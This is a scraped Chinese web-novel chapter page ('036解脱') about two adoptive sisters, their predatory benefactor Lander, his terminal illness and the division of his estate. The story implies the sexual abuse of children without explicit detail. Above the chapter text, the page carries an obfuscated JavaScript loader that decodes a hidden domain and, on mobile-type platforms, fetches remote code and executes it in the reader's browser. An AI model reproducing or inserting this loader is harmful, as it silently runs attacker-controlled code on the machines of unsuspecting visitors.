98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

036解脱(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('036解脱

又一个平淡的早餐时间,小栀子扮演听话的妹妹,尴尬又无聊。

餐厅里女孩们相对而坐,只听得见餐具与盘子的碰撞声,正要结束用餐的时候稍长一点的女孩打目光锁定对面:“小栀子你也喜欢爸爸对不对?”餐盘里的培根被刀叉分成几段。

还是小女孩的晚栀笑得乖巧:“妈妈和叔叔在一起很幸福,我也很感恩。”

“那爸爸有困难你是不是应该帮忙分担?”

“……如果我可以提供帮助的话。”

灿烂的弧度在宋凌菲嘴边漾开:“你生日那天去楼上送礼物给爸爸,他一定会很开心。”

“礼物?”餐具被放回桌子上,餐厅瞬间安静

“开心的事都在开心的日子,那不是很棒吗?”

“我没有什么让人开心的礼物。”

她双手捧着晚栀的脸:“你就是最好的礼物。”

“为什么一定要礼物?”极力在四目相对中掩饰内里的鄙夷,晚栀岔开话题,“我知道了!之前拖了很久的作业完工了可以当礼物,画得还不错,他一定很高兴。”

兰德对于晚栀才华的喜爱众所周知,甚至对于她本身气质的喜爱也是溢于言表的,这种喜爱程度和宋凌菲对她的厌恶程度成正比。

很快地,明丽的眼睛里被愤恨占据。

兰德一贯欣赏有灵性的画者,但天分这东西,是她再怎么努力也补不来的。

强烈的嫉妒再次侵蚀在心头,兰德是宋凌菲心中最有魅力的男性,从福利院开始就会蹲下来问她愿不愿意跟他走,并且送给她一双红皮鞋作为见面礼,亮丽的鞋子穿在脚上仿佛为她定制,那是她第一次感受到尊重和优待。

想要得到就得付出,这个道理她懂,她爱爸爸,他所有或普通或怪异的要求她都心甘情愿地顺从。

兰德说她是他的天使,会对她的衣食住行亲力亲为,会教她如何欣赏品鉴,会送她学习很多才艺,会带她去看太阳马戏团,Vegas的表演很精彩,极度惊艳的时刻他给她亲吻与爱抚。

尽管他们那么亲密,兰德是她爸爸,他会有他的妻子。

可是有人一开始就轻松拥有她梦寐的重视,她怎么能甘心?

“嗨。” 玻璃墙那边,水晶指甲在冰冷的灯光下闪烁。

许褚面无表情地立在一侧,宋凌菲笑容如往常般璀璨,实在看不透。

“看来你心情不错。”等车的时候接到电话说宋凌菲想见她,她不知道兰德家族那边撤诉的事有没有对案件有影响,事实上一天下来她已无暇顾及这个烂摊子了。

宋凌菲对着她苍白的脸“啧啧”道:“看来你状态很不好。”

“这么有闲工夫和我闲聊?”

“你不是还来了?”

她顺着自嘲:“是啊。”

“我也是着了你的道了。”宋凌菲端详她的脸色,疲惫的神色下并无虚弱的病容,“应该是说你那位很厉害。”

晚栀看破对面的不甘:“你以为我认了。”

宋凌菲只是盯着她笑:“你最可笑了虞晚栀。”笑声在小小的空间里回荡,颇为讽刺:“你不会天真地以为……一点苦艾真的有用吧?”

“也对。”她唇边的笑饱含深意,“这么精彩的大戏少了你可惜了。”

宋凌菲一针见血道:“你也算永远不得解脱了。”

晚栀愣在那艳丽的眼眸中的洞悉里:“彼此彼此。”

没人比这个永远的天敌更了解她。

很讽刺不是吗?

“机关算尽呢。”宋凌菲愉悦地看着对面苍白的嘴唇无声地动了动。

爸爸不爱她了,她很苦恼。

宋凌菲绽开璀璨到怪异的笑:“如果他终结在我手里,就永远属于我了。”

红舞鞋很漂亮,可是穿上了就停不下。

所以她艰难地撕开被缝住的嘴,拨通了电话。

她才是最先解脱的那一个。

还是那个早晨。

宋凌菲正思索着如何开口,晚栀冷不丁从她手边抽走文件袋,一抬头就见她姐姐轻舔干燥的嘴唇,故作苦恼状走远:“其实……你也知道吧?爸爸最近身体不太好。”

诊断书的字样呈现眼前,大大的“ALS”(渐冻症)面前晚栀整个人便陷入茫然的恐慌里,濒死的猫怎么会放过股掌之中的老鼠呢。

这样坐以待毙下去,必死无疑,脖子上的手正伺机而动着,扼杀掉她最后一口气。

手中的纸张被慌乱地夺走,晚栀回过神来,宋凌菲的眼光带着未收回的蛮横。

晚栀耸肩,随意转到落地窗前的小桌上翻看正摊开的书,各种关古代祭祀的图样跃然纸上。

“只要是你画的爸爸一定都很开心。”垂眼看书的精致脸庞稚气未脱,宋凌菲坐在一旁的椅子上如往常一样各自休憩,余光轻视那抹青涩,她交出自己能 给的一切,都未能得到的东西,这位新妹妹轻而易举获得了,既然得到了怎么能不交付点东西呢?

晚栀突然叫住她:“姐姐,你知道古代有‘殉葬’一说吗?”

“晚栀我们去加拿大吧。”

父亲刚回家,晚栀对这个要求反应不过来:“嗯?”

“我要去那边交流两年,你也正好换个环境,魁北克的枫叶你会喜欢。”

晚栀察觉父亲眼底的担忧,愧疚地低下头:“对不起……”

“没什么对不起的,爸爸对不起你才是,去加拿大可以吗?”虞锦年摸摸女儿的头,他最担心的就是她太自责。

晚栀笑着点头:“好啊。”

再好不过了。

三年后

蒙特利尔的枫叶果然很好看,Mcgill学术氛围多元包容,生活舒适惬意。

“如果没有异议请在这儿签字。”充满质感的钢笔递到手边。

晚栀十八岁前夕,兰德的律师来麦吉尔大学找到她,关于遗产的事。

签署完毕,晚栀跟他道谢:“麻烦你了,慈善基金我已经请洛佩兹夫人代为管理。”

“能为你这么富有爱心的女士服务,是我的荣幸。”

最后遗产分割,个人所得比例最大的是宋凌菲。

只知道三人共同分割三分之一,这之前并不知道这么仔细的比例。

想起她努力维持崩溃情绪的神色,蔻丹染上掌心血。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间